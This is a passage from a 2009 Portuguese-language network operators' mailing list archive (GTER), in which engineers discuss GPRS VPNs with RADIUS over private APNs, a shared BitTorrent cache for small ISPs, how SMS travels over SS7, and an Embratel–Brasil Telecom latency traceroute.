medi??o de > > distribui??o de energia. > > Baixo custo e facilidade de entrega s?o bem vindos! > > > > > > N?o ? bem um equipamento, mas vai uma dica. Algumas > operadoras de celular (Vivo e TIM eu tenho certeza pois j? > participei de projetos de implementa??o com essas) oferecem > um servi?o de rede corporativa em cima de GPRS. > > Basicamente voc? vai configurar seu modem com uma nova > APN e n?o a APN de internet da operadora. Nessa nova APN, um > servidor radius seu que vai fazer autentica??o do > usu?rio/senha informados. O IP, portanto, pode ser designado > pelo seu radius baseado no que voc? quiser. Eu j? distribui > IP baseado no usu?rio/senha e tamb?m no telefone > (Calling-Station-Id). Tenho um projeto rodando que > usu?rio/senha ? ?nico pra rede inteira, eu mudo o IP baseado > no telefone de origem. E como tenho uma rela??o do telefone > com o equipamento em quest?o, eu consigo sempre saber qual ? > o IP daquele dispositivo. > > Uma vez estabelecida a conex?o e recebido o IP que seu > radius mandou, aquele IP roteia tr?fego direto pra voc?, sem > precisar de fechar VPN entre o ponto GPRS. > > Na implanta??o, geralmente existe uma VPN sim entre a > operadora de telefonia e a sua empresa. L2TP+IPSec, GRE, > IPSEC ... j? vi v?rios modelos diferentes de operadoras > diferentes. Mas a? feita toda essa parte de VPN entre voc? e > a operadora, no dispositivo GPRS a configura??o ? trivial: > APN, usu?rio e senha. > > N?o sei qual ? a sua necessidade ... mas caso voc? esteja > planejando utilizar uma ?nica operadora, que seria > interessante pra fechar um contrato de volume de dados, > verifique a possibilidade de utilizar esses servi?os de VPN > da pr?pria operadora. Dessa forma, voc? simplifica > imensamente a configura??o das pontas, permitindo utilizar > qualquer dispositivo embarcado com suporte a GPRS, eliminando > a necessidade de VPN na ponta. > > > > -- > > > Atenciosamente / Sincerily, > Leonardo Rodrigues > Solutti Tecnologia > http://www.solutti.com.br > > Minha armadilha de SPAM, N?O mandem email > gertrudes at solutti.com.br > My SPAMTRAP, do not email it > > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From antoniocarlospina at gmail.com Thu Jun 25 09:57:55 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Thu, 25 Jun 2009 09:57:55 -0300 Subject: [GTER] Cache de BitTorrent In-Reply-To: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com> References: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com> Message-ID: <86b352050906250557p1eb5dbbby587e8337dff8ae12@mail.gmail.com> Sugiro que voc? avalie a possibilidade de tamb?m se conectar ao PTT-Metro ( www.ptt.br). Conectando-se unicamente a Terremark voc? acaba restringindo seu alcance com o produto. Abs 2009/6/24 Provedor Bogus > Caros colegas, > > Primeiramente pe?o desculpas se essa n?o ? a melhor lista para tratar > deste assunto. > > H? algum tempo consultamos empresas (PeerApp e Oversi) sobre o custo > de implanta??o de um cache de P2P e nos > assustamos com o custo do hardware e principalmente do software, > completamente invi?veis para qualquer empresa > de pequeno e m?dio porte s? sendo justific?vel para carriers. > > Assim, somos um provedor pequeno do interior do estado do Rio de > Janeiro e desenvolvemos uma solu??o de cache > transparente para BitTorrent (futuramente servir? tamb?m para a rede > eDonkey). N?o gostar?amos de nos identificar > porque ainda estamos levantando os aspectos jur?dicos da proposta que > trazemos e contaremos tamb?m com as > respostas de outros interessados para formular nossa forma de > funcionamento. > > Sobre o c?digo desenvolvido, o cache funciona perfeitamente, ? > escalon?vel, pode ser dividido em v?rias m?quinas para > quest?es de alta disponibilidade e consome pouca CPU podendo ser > executado numa m?quina Linux com 16 GB de RAM > e aconselhamos um processador Core i7 b?sico. > Nossa m?quina de produ??o tem exatamente essa configura??o e custou > cerca de R$ 2.800 com placa-m?e Supermicro. > > O problema atual ? que possu?mos pouco volume de tr?fego para popular > o cache e com isso o hit ratio alcan?ado fica em > torno de 6%, sendo que o desej?vel ? qualquer coisa acima de 35%. > > Por isso estamos recorrendo a esta lista. > > A id?ia ? que outros provedores (fora do Rio de Janeiro, por quest?es > de mercado) tamb?m possuam uma m?quina de > cache que ir? compartilhar o nosso servidor de conte?do (que ? uma > m?quina com 4 processadores Quad-Xeon > e 64 GB de RAM) de 45 TB. O modelo de neg?cios s? fica interessante se > pudermos utilizar um link de Internet mais > barato do que os contratados das carriers e por isso os interessados > dever?o estar conectados ao NAP das Am?ricas > na Terremark. Espera-se com isso baixar o custo de link para o tr?fego > P2P sem diminuir a qualidade para o usu?rio > final. > > Se algu?m estiver interessado em participar disso, por favor, envie > uma mensagem privada. > > Atenciosamente, > > Provedor Bogus > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From lscrlstld at gmail.com Thu Jun 25 10:29:23 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Thu, 25 Jun 2009 10:29:23 -0300 Subject: [GTER] RES: Modem/Router GPRS + VPN In-Reply-To: <4A4262FC.8070000@solutti.com.br> References: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> <4A4262FC.8070000@solutti.com.br> Message-ID: <97DF537E5FC54563BC472B18AAA4B3C8@toledoPC> Existem algumas VSAs que o GGSN espera trocar com o radius em determinado momento, especialmente quando a carga aumenta. ? a? que bixo pega, principalmente nas novas plataformas 3G que utilizam VSAs que fogem do 3GPP. ? muito.. Muito.. arriscado esperar estabilidade apenas trocando Auth-requests e Acct-requests. A estabilidade dos tuneis tambem ? critico, pois as operadoras utilizam equipamentos propriet?rios (Nokia, Nortel, Ericsson, Lucent..) os quais esperam alinhar o tunel com um par igual do outro lado. Em baixo volume funciona, quando escala os resultados s?o tr?gicos. Tamb?m tenho projetos implantados nesse modelo de "APN Privada" + wVPN + Radius, sei bem o que acontece a partir do 10.001 chip. Abs Toledo > > Tasso Faria escreveu: > > Pessoal, > > > > Algu?m recomenda algum modem/router GPRS que permita o > estabelecimento > > de VPN com um ponto concentrador? Ou seja, a inten??o ? > controlar esta > > rede e seu endere?amento. > > > > Gostaria de utilizar o mesmo para o processo de medi??o de > > distribui??o de energia. > > Baixo custo e facilidade de entrega s?o bem vindos! > > > > > > N?o ? bem um equipamento, mas vai uma dica. Algumas > operadoras de celular (Vivo e TIM eu tenho certeza pois j? > participei de projetos de implementa??o com essas) oferecem > um servi?o de rede corporativa em cima de GPRS. > > Basicamente voc? vai configurar seu modem com uma nova > APN e n?o a APN de internet da operadora. Nessa nova APN, um > servidor radius seu que vai fazer autentica??o do > usu?rio/senha informados. O IP, portanto, pode ser designado > pelo seu radius baseado no que voc? quiser. Eu j? distribui > IP baseado no usu?rio/senha e tamb?m no telefone > (Calling-Station-Id). Tenho um projeto rodando que > usu?rio/senha ? ?nico pra rede inteira, eu mudo o IP baseado > no telefone de origem. E como tenho uma rela??o do telefone > com o equipamento em quest?o, eu consigo sempre saber qual ? > o IP daquele dispositivo. > > Uma vez estabelecida a conex?o e recebido o IP que seu > radius mandou, aquele IP roteia tr?fego direto pra voc?, sem > precisar de fechar VPN entre o ponto GPRS. > > Na implanta??o, geralmente existe uma VPN sim entre a > operadora de telefonia e a sua empresa. L2TP+IPSec, GRE, > IPSEC ... j? vi v?rios modelos diferentes de operadoras > diferentes. Mas a? feita toda essa parte de VPN entre voc? e > a operadora, no dispositivo GPRS a configura??o ? trivial: > APN, usu?rio e senha. > > N?o sei qual ? a sua necessidade ... mas caso voc? esteja > planejando utilizar uma ?nica operadora, que seria > interessante pra fechar um contrato de volume de dados, > verifique a possibilidade de utilizar esses servi?os de VPN > da pr?pria operadora. Dessa forma, voc? simplifica > imensamente a configura??o das pontas, permitindo utilizar > qualquer dispositivo embarcado com suporte a GPRS, eliminando > a necessidade de VPN na ponta. > > > > -- > > > Atenciosamente / Sincerily, > Leonardo Rodrigues > Solutti Tecnologia > http://www.solutti.com.br > > Minha armadilha de SPAM, N?O mandem email > gertrudes at solutti.com.br > My SPAMTRAP, do not email it > > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From webgeo at gmail.com Thu Jun 25 08:47:18 2009 From: webgeo at gmail.com (Giovane Heleno) Date: Thu, 25 Jun 2009 08:47:18 -0300 Subject: [GTER] RES: Iran In-Reply-To: <4A4282CC.2070508@jarruda.com> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: Deixei de trabalhar com isso, quando o SMS estava engatinhando ainda. Mas acredito que o SMS n?o ? encaminhado por SS7 entre as centrais. As mesmas encaminham o SMS, diretamente para a plataforma inteligente (n?o sei qual o nome hoje). Pelo menos era assim na EWSD que eu trabalhava. O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e controle das rotas e canais de voz, e o trafego SMS n?o ? roteado pelos canais de voz. Agora, se usa IP, a? n?o sei mesmo... Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. Giovane Heleno Wideway do Brasil Ltda www.wideway.com.br meadiciona.com/giovane 2009/6/24 Julio Arruda : > Toledo, Luis Carlos wrote: >> >> S? esqueceu de mencionar o flood gigantesco de SMS enviado +- duas horas >> depois do encerramento da elei??o, logo ap?s houve o bloqueio. >> > > Uma curiosidade aidicional > Em ao menos um pais do Caribe, onde a alguns anos tiveram uns atentados a > bomba, a rede SS7 dos celulares deu umas 'quedas'.. > > O problema foi relacionado com a quantidade de pessoas ligando ao mesmo > tempo, da capital, de uma regiao especifica. > > Redes SS7, no meu parco conhecimento, apesar de muito robustas, sao muito > 'estaticas', e se nao forem dimensionadas para tratar estes 'eventos > anormais', nao seguram o rojao. > > SMS, pelo que sei, nao trafega sobre IP, e sim sobre SS7 ? > > >>> Recentemente os malucos..errr..pesquisadores la do asert publicaram >>> alguns artigos sobre Iran e etc.. >>> http://asert.arbornetworks.com/ >>> >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From lscrlstld at gmail.com Thu Jun 25 11:55:25 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Thu, 25 Jun 2009 11:55:25 -0300 Subject: [GTER] RES: RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com><4A4282CC.2070508@jarruda.com> Message-ID: ?.. Parece que foi o lado de c? que forneceu a tecnologia para o bloqueio do lado de l? http://online.wsj.com/article/SB124562668777335653.html > Deixei de trabalhar com isso, quando o SMS estava engatinhando ainda. > Mas acredito que o SMS n?o ? encaminhado por SS7 entre as centrais. > As mesmas encaminham o SMS, diretamente para a plataforma > inteligente (n?o sei qual o nome hoje). > Pelo menos era assim na EWSD que eu trabalhava. > > O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o > e controle das rotas e canais de voz, e o trafego SMS n?o ? > roteado pelos canais de voz. > > Agora, se usa IP, a? n?o sei mesmo... > > Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. > > Giovane Heleno > Wideway do Brasil Ltda > www.wideway.com.br > meadiciona.com/giovane > > > 2009/6/24 Julio Arruda : > > Toledo, Luis Carlos wrote: > >> > >> S? esqueceu de mencionar o flood gigantesco de SMS enviado +- duas > >> horas depois do encerramento da elei??o, logo ap?s houve o > bloqueio. > >> > > > > Uma curiosidade aidicional > > Em ao menos um pais do Caribe, onde a alguns anos tiveram uns > > atentados a bomba, a rede SS7 dos celulares deu umas 'quedas'.. > > > > O problema foi relacionado com a quantidade de pessoas ligando ao > > mesmo tempo, da capital, de uma regiao especifica. > > > > Redes SS7, no meu parco conhecimento, apesar de muito robustas, sao > > muito 'estaticas', e se nao forem dimensionadas para tratar estes > > 'eventos anormais', nao seguram o rojao. > > > > SMS, pelo que sei, nao trafega sobre IP, e sim sobre SS7 ? > > > > > >>> Recentemente os malucos..errr..pesquisadores la do asert > publicaram > >>> alguns artigos sobre Iran e etc.. > >>> http://asert.arbornetworks.com/ > >>> > >>> -- > >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > >> > >> -- > >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > > > -- > > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From marcusandree at gmail.com Thu Jun 25 12:26:21 2009 From: marcusandree at gmail.com (Marcus Andree) Date: Thu, 25 Jun 2009 12:26:21 -0300 Subject: [GTER] RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: O SMS nao usa canal de voz na comunicacao entre o aparelho e a ERB. Usa apenas uma "banda excedente" do canal de controle. Isso explica como e' possivel receber um SMS enquanto o usuario esta' numa chamada de voz. Uma vez na rede GSM, a informacao trafega via SS7. Em muitos pontos da rede SS7, existem equipamentos "gateway" que podem receber informacao via IP e gerar trafego SS7 a partir dessa informacao recebida. Um exemplo "classico" e' o proprio SMS.... Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" links IP. Esta parece ser uma tendencia num futuro nao muito distante. > > O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e > controle das rotas e canais de voz, e o trafego SMS n?o ? roteado > pelos canais de voz. > > Agora, se usa IP, a? n?o sei mesmo... > > Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. > From provedorbogus at gmail.com Thu Jun 25 12:01:28 2009 From: provedorbogus at gmail.com (Provedor Bogus) Date: Thu, 25 Jun 2009 12:01:28 -0300 Subject: [GTER] Cache de BitTorrent In-Reply-To: <86b352050906250557p1eb5dbbby587e8337dff8ae12@mail.gmail.com> References: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com> <86b352050906250557p1eb5dbbby587e8337dff8ae12@mail.gmail.com> Message-ID: <5e00a4be0906250801k996f3dby68e38b410a49c7fe@mail.gmail.com> Ant?nio, A sua sugest?o ? excelente. O problema ? que inicialmente isso n?o seria um produto porque somos um provedor como outros aqui e com a mesma necessidade de baixar o custo do P2P. Como j? estamos linkados na Terremark a coisa fica mais f?cil e r?pida de ser botada em pr?tica. Se a coisa tomar vulto, podemos hospedar um servidor de conte?do tamb?m no PTT Metro e un?-los. Um abra?o ! 2009/6/25 Antonio Carlos Pina > Sugiro que voc? avalie a possibilidade de tamb?m se conectar ao PTT-Metro ( > www.ptt.br). > > Conectando-se unicamente a Terremark voc? acaba restringindo seu alcance > com > o produto. > Abs > 2009/6/24 Provedor Bogus > > > Caros colegas, > > > > Primeiramente pe?o desculpas se essa n?o ? a melhor lista para > tratar > > deste assunto. > > > > H? algum tempo consultamos empresas (PeerApp e Oversi) sobre o custo > > de implanta??o de um cache de P2P e nos > > assustamos com o custo do hardware e principalmente do software, > > completamente invi?veis para qualquer empresa > > de pequeno e m?dio porte s? sendo justific?vel para carriers. > > > > Assim, somos um provedor pequeno do interior do estado do Rio de > > Janeiro e desenvolvemos uma solu??o de cache > > transparente para BitTorrent (futuramente servir? tamb?m para a rede > > eDonkey). N?o gostar?amos de nos identificar > > porque ainda estamos levantando os aspectos jur?dicos da proposta > que > > trazemos e contaremos tamb?m com as > > respostas de outros interessados para formular nossa forma de > > funcionamento. > > > > Sobre o c?digo desenvolvido, o cache funciona perfeitamente, ? > > escalon?vel, pode ser dividido em v?rias m?quinas para > > quest?es de alta disponibilidade e consome pouca CPU podendo ser > > executado numa m?quina Linux com 16 GB de RAM > > e aconselhamos um processador Core i7 b?sico. > > Nossa m?quina de produ??o tem exatamente essa configura??o e custou > > cerca de R$ 2.800 com placa-m?e Supermicro. > > > > O problema atual ? que possu?mos pouco volume de tr?fego para > popular > > o cache e com isso o hit ratio alcan?ado fica em > > torno de 6%, sendo que o desej?vel ? qualquer coisa acima de 35%. > > > > Por isso estamos recorrendo a esta lista. > > > > A id?ia ? que outros provedores (fora do Rio de Janeiro, por > quest?es > > de mercado) tamb?m possuam uma m?quina de > > cache que ir? compartilhar o nosso servidor de conte?do (que ? uma > > m?quina com 4 processadores Quad-Xeon > > e 64 GB de RAM) de 45 TB. O modelo de neg?cios s? fica interessante > se > > pudermos utilizar um link de Internet mais > > barato do que os contratados das carriers e por isso os interessados > > dever?o estar conectados ao NAP das Am?ricas > > na Terremark. Espera-se com isso baixar o custo de link para o > tr?fego > > P2P sem diminuir a qualidade para o usu?rio > > final. > > > > Se algu?m estiver interessado em participar disso, por favor, envie > > uma mensagem privada. > > > > Atenciosamente, > > > > Provedor Bogus > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From mauriciobentoghem at gmail.com Thu Jun 25 13:40:58 2009 From: mauriciobentoghem at gmail.com (Mauricio Bento Ghem) Date: Thu, 25 Jun 2009 13:40:58 -0300 Subject: [GTER] RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: Falando nisso, o blog http://asert.arbornetworks.com/ est? baleado. N?o consegui mais acess?-lo. 2009/6/25 Marcus Andree > O SMS nao usa canal de voz na comunicacao entre o aparelho e > a ERB. Usa apenas uma "banda excedente" do canal de controle. > > Isso explica como e' possivel receber um SMS enquanto o usuario > esta' numa chamada de voz. > > Uma vez na rede GSM, a informacao trafega via SS7. Em muitos > pontos da rede SS7, existem equipamentos "gateway" que podem > receber informacao via IP e gerar trafego SS7 a partir dessa informacao > recebida. Um exemplo "classico" e' o proprio SMS.... > > Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" > links IP. Esta parece ser uma tendencia num futuro nao muito distante. > > > > > O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e > > controle das rotas e canais de voz, e o trafego SMS n?o ? roteado > > pelos canais de voz. > > > > Agora, se usa IP, a? n?o sei mesmo... > > > > Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Maur?cio Bento Ghem Website: www.bentow.com.br Email: mauriciobentoghem at gmail.com Home Phone: +55 (51) 3524-9192 Mobile Phone: +55 (51) 8146-8553 Skype: mauriciobentow From webgeo at gmail.com Thu Jun 25 13:42:09 2009 From: webgeo at gmail.com (Giovane Heleno) Date: Thu, 25 Jun 2009 13:42:09 -0300 Subject: [GTER] RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: Mas, uma vez dentro da central, o SMS ? comutado para outras centrais de comuta??o, ou ela ? enviada para alguma plataforma diretamente? O SS7 tem suporte a isso? Abra?os, Giovane Heleno 2009/6/25 Marcus Andree : > O SMS nao usa canal de voz na comunicacao entre o aparelho e > a ERB. Usa apenas uma "banda excedente" do canal de controle. > > Isso explica como e' ?possivel receber um SMS enquanto o usuario > esta' numa chamada de voz. > > Uma vez na rede GSM, a informacao trafega via SS7. Em muitos > pontos da rede SS7, existem equipamentos "gateway" que podem > receber informacao via IP e gerar trafego SS7 a partir dessa informacao > recebida. Um exemplo "classico" e' o proprio SMS.... > > Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" > links IP. Esta parece ser uma tendencia num futuro nao muito distante. > >> >> O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e >> controle das rotas e canais de voz, e o trafego SMS n?o ? roteado >> pelos canais de voz. >> >> Agora, se usa IP, a? n?o sei mesmo... >> >> Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From rubensk at gmail.com Thu Jun 25 15:50:50 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Thu, 25 Jun 2009 15:50:50 -0300 Subject: [GTER] Latencia alta entre Embratel e Brasil Telecom Message-ID: <6bb5f5b10906251150s509f5f2bqb76f94b20928583d@mail.gmail.com> Estamos notando uma lat?ncia muito alta de tr?fego indo da Embratel para a Brasil Telecom: 4 9 ms 7 ms 9 ms embratel-G0-3-nacc02.soc.embratel.net.br [189.86.100.1] 5 10 ms 9 ms 11 ms 200.230.247.2 6 11 ms 11 ms 11 ms ebt-P1-1-0-core03.spo.embratel.net.br [200.244.140.230] 7 12 ms 11 ms 18 ms ebt-C1-gacc03.spomb.embratel.net.br [200.230.242.142] 8 300 ms 300 ms 303 ms peer-P4-3-gacc03.spomb.embratel.net.br [200.211.219.170] 9 334 ms 339 ms 346 ms BrT-G7-1-spopa302.brasiltelecom.net.br [201.10.241.150] Algu?m mais notou algum efeito ex?tico como este ? Rubens From lscrlstld at gmail.com Thu Jun 25 17:15:07 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Thu, 25 Jun 2009 17:15:07 -0300 Subject: [GTER] RES: Cache de BitTorrent In-Reply-To: <5e00a4be0906250801k996f3dby68e38b410a49c7fe@mail.gmail.com> References: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com><86b352050906250557p1eb5dbbby587e8337dff8ae12@mail.gmail.com> <5e00a4be0906250801k996f3dby68e38b410a49c7fe@mail.gmail.com> Message-ID: <3A3FEDF0BB48484B8DB2DD8F901F119F@toledoPC> Uma op??o j? q o custo dos boxes s?o caros, e a aquisi??o em forma de cons?rcio ou associa??o, sendo cada cotista investi um quinh?o e tem direito a parte do uso > > Ant?nio, > > A sua sugest?o ? excelente. O problema ? que inicialmente > isso n?o seria um produto porque somos um provedor como > outros aqui e com a mesma necessidade de baixar o custo do > P2P. Como j? estamos linkados na Terremark a coisa fica mais > f?cil e r?pida de ser botada em pr?tica. Se a coisa tomar > vulto, podemos hospedar um servidor de conte?do tamb?m no PTT > Metro e un?-los. > > Um abra?o ! > > > 2009/6/25 Antonio Carlos Pina > > > Sugiro que voc? avalie a possibilidade de tamb?m se conectar ao > > PTT-Metro ( www.ptt.br). > > > > Conectando-se unicamente a Terremark voc? acaba restringindo seu > > alcance com o produto. > > Abs > > 2009/6/24 Provedor Bogus > > > > > Caros colegas, > > > > > > Primeiramente pe?o desculpas se essa n?o ? a melhor > lista para > > tratar > > > deste assunto. > > > > > > H? algum tempo consultamos empresas (PeerApp e > Oversi) sobre o > > > custo de implanta??o de um cache de P2P e nos > > > assustamos com o custo do hardware e principalmente do > > > software, completamente invi?veis para qualquer empresa > > > de pequeno e m?dio porte s? sendo justific?vel para carriers. > > > > > > Assim, somos um provedor pequeno do interior do > estado do Rio > > > de Janeiro e desenvolvemos uma solu??o de cache > > > transparente para BitTorrent (futuramente servir? > tamb?m para a > > > rede eDonkey). N?o gostar?amos de nos identificar > > > porque ainda estamos levantando os aspectos jur?dicos da > > > proposta > > que > > > trazemos e contaremos tamb?m com as > > > respostas de outros interessados para formular nossa > forma de > > > funcionamento. > > > > > > Sobre o c?digo desenvolvido, o cache funciona > perfeitamente, ? > > > escalon?vel, pode ser dividido em v?rias m?quinas para > > > quest?es de alta disponibilidade e consome pouca CPU podendo > > > ser executado numa m?quina Linux com 16 GB de RAM > > > e aconselhamos um processador Core i7 b?sico. > > > Nossa m?quina de produ??o tem exatamente essa configura??o e > > > custou cerca de R$ 2.800 com placa-m?e Supermicro. > > > > > > O problema atual ? que possu?mos pouco volume de tr?fego para > > popular > > > o cache e com isso o hit ratio alcan?ado fica em > > > torno de 6%, sendo que o desej?vel ? qualquer coisa > acima de 35%. > > > > > > Por isso estamos recorrendo a esta lista. > > > > > > A id?ia ? que outros provedores (fora do Rio de Janeiro, por > > quest?es > > > de mercado) tamb?m possuam uma m?quina de > > > cache que ir? compartilhar o nosso servidor de > conte?do (que ? > > > uma m?quina com 4 processadores Quad-Xeon > > > e 64 GB de RAM) de 45 TB. O modelo de neg?cios s? fica > > > interessante > > se > > > pudermos utilizar um link de Internet mais > > > barato do que os contratados das carriers e por isso os > > > interessados dever?o estar conectados ao NAP das Am?ricas > > > na Terremark. Espera-se com isso baixar o custo de > link para o > > tr?fego > > > P2P sem diminuir a qualidade para o usu?rio > > > final. > > > > > > Se algu?m estiver interessado em participar disso, > por favor, > > > envie uma mensagem privada. > > > > > > Atenciosamente, > > > > > > Provedor Bogus > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From jarruda-gter at jarruda.com Thu Jun 25 17:01:47 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Thu, 25 Jun 2009 16:01:47 -0400 Subject: [GTER] RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: <4A43D7AB.2070607@jarruda.com> Mauricio Bento Ghem wrote: > Falando nisso, o blog http://asert.arbornetworks.com/ est? baleado. N?o > consegui mais acess?-lo. > Daqui esta entrando, nao sei se pode ser algo 'localizado'.. > 2009/6/25 Marcus Andree > >> O SMS nao usa canal de voz na comunicacao entre o aparelho e >> a ERB. Usa apenas uma "banda excedente" do canal de controle. >> >> Isso explica como e' possivel receber um SMS enquanto o usuario >> esta' numa chamada de voz. >> >> Uma vez na rede GSM, a informacao trafega via SS7. Em muitos >> pontos da rede SS7, existem equipamentos "gateway" que podem >> receber informacao via IP e gerar trafego SS7 a partir dessa informacao >> recebida. Um exemplo "classico" e' o proprio SMS.... >> >> Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" >> links IP. Esta parece ser uma tendencia num futuro nao muito distante. >> >>> O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e >>> controle das rotas e canais de voz, e o trafego SMS n?o ? roteado >>> pelos canais de voz. >>> >>> Agora, se usa IP, a? n?o sei mesmo... >>> >>> Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > > From marcusandree at gmail.com Thu Jun 25 18:20:24 2009 From: marcusandree at gmail.com (Marcus Andree) Date: Thu, 25 Jun 2009 18:20:24 -0300 Subject: [GTER] RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: nao entendi o que voce quis dizer por "central" e "centrais de comutacao". A telefonia celular opera de forma bastante diferente da telefonia fixa. Claro que ha excecoes e algumas evolucoes do SMS, mas, na ideia como foi concebida, ele funciona utilizando apenas a rede de controle, via protocolo SS7. 2009/6/25 Giovane Heleno : > Mas, uma vez dentro da central, o SMS ? comutado para outras centrais > de comuta??o, ou ela ? enviada para alguma plataforma diretamente? > O SS7 tem suporte a isso? > > Abra?os, > > Giovane Heleno > > > 2009/6/25 Marcus Andree : >> O SMS nao usa canal de voz na comunicacao entre o aparelho e >> a ERB. Usa apenas uma "banda excedente" do canal de controle. >> >> Isso explica como e' ?possivel receber um SMS enquanto o usuario >> esta' numa chamada de voz. >> >> Uma vez na rede GSM, a informacao trafega via SS7. Em muitos >> pontos da rede SS7, existem equipamentos "gateway" que podem >> receber informacao via IP e gerar trafego SS7 a partir dessa informacao >> recebida. Um exemplo "classico" e' o proprio SMS.... >> >> Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" >> links IP. Esta parece ser uma tendencia num futuro nao muito distante. >> >>> >>> O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e >>> controle das rotas e canais de voz, e o trafego SMS n?o ? roteado >>> pelos canais de voz. >>> >>> Agora, se usa IP, a? n?o sei mesmo... >>> >>> Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. >>> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From jarruda-gter at jarruda.com Thu Jun 25 19:02:44 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Thu, 25 Jun 2009 18:02:44 -0400 Subject: [GTER] RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: <4A43F404.9020304@jarruda.com> Marcus Andree wrote: > nao entendi o que voce quis dizer por "central" e "centrais de comutacao". > A telefonia celular opera de forma bastante diferente da telefonia fixa. Onde se le, central/centrais de comutacao, presumo que ele quer dizer os MSCs (ou o que tenha substituido isto). > > Claro que ha excecoes e algumas evolucoes do SMS, mas, na ideia > como foi concebida, ele funciona utilizando apenas a rede de controle, > via protocolo SS7. Acho que os exemplos que o pessoal esta falando, e' que em algum 'momento' no caminho, o que chegou do telefone celular em "SMS" que e' sobre SS7, vira algo diferente.. Eu lembro vagamente dos AIN e etc, acho que de qualquer forma, normalmente isto estaria viajando em SS7, e possivelmente algumas empresas poderiam estar usando os tais gateways, mas 'fim a fim', parece ser SS7 do mesmo jeito :-).. Eu cheguei a trabalhar um pouco com os chamados STPs (USP em NT-speak), e eles tinham opcao de fazer IPS7, que era SS7 em IP. > > 2009/6/25 Giovane Heleno : >> Mas, uma vez dentro da central, o SMS ? comutado para outras centrais >> de comuta??o, ou ela ? enviada para alguma plataforma diretamente? >> O SS7 tem suporte a isso? >> >> Abra?os, >> >> Giovane Heleno >> >> >> 2009/6/25 Marcus Andree : >>> O SMS nao usa canal de voz na comunicacao entre o aparelho e >>> a ERB. Usa apenas uma "banda excedente" do canal de controle. >>> >>> Isso explica como e' possivel receber um SMS enquanto o usuario >>> esta' numa chamada de voz. >>> >>> Uma vez na rede GSM, a informacao trafega via SS7. Em muitos >>> pontos da rede SS7, existem equipamentos "gateway" que podem >>> receber informacao via IP e gerar trafego SS7 a partir dessa informacao >>> recebida. Um exemplo "classico" e' o proprio SMS.... >>> >>> Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" >>> links IP. Esta parece ser uma tendencia num futuro nao muito distante. >>> >>>> O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e >>>> controle das rotas e canais de voz, e o trafego SMS n?o ? roteado >>>> pelos canais de voz. >>>> >>>> Agora, se usa IP, a? n?o sei mesmo... >>>> >>>> Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. >>>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter From fabriciofx at gmail.com Thu Jun 25 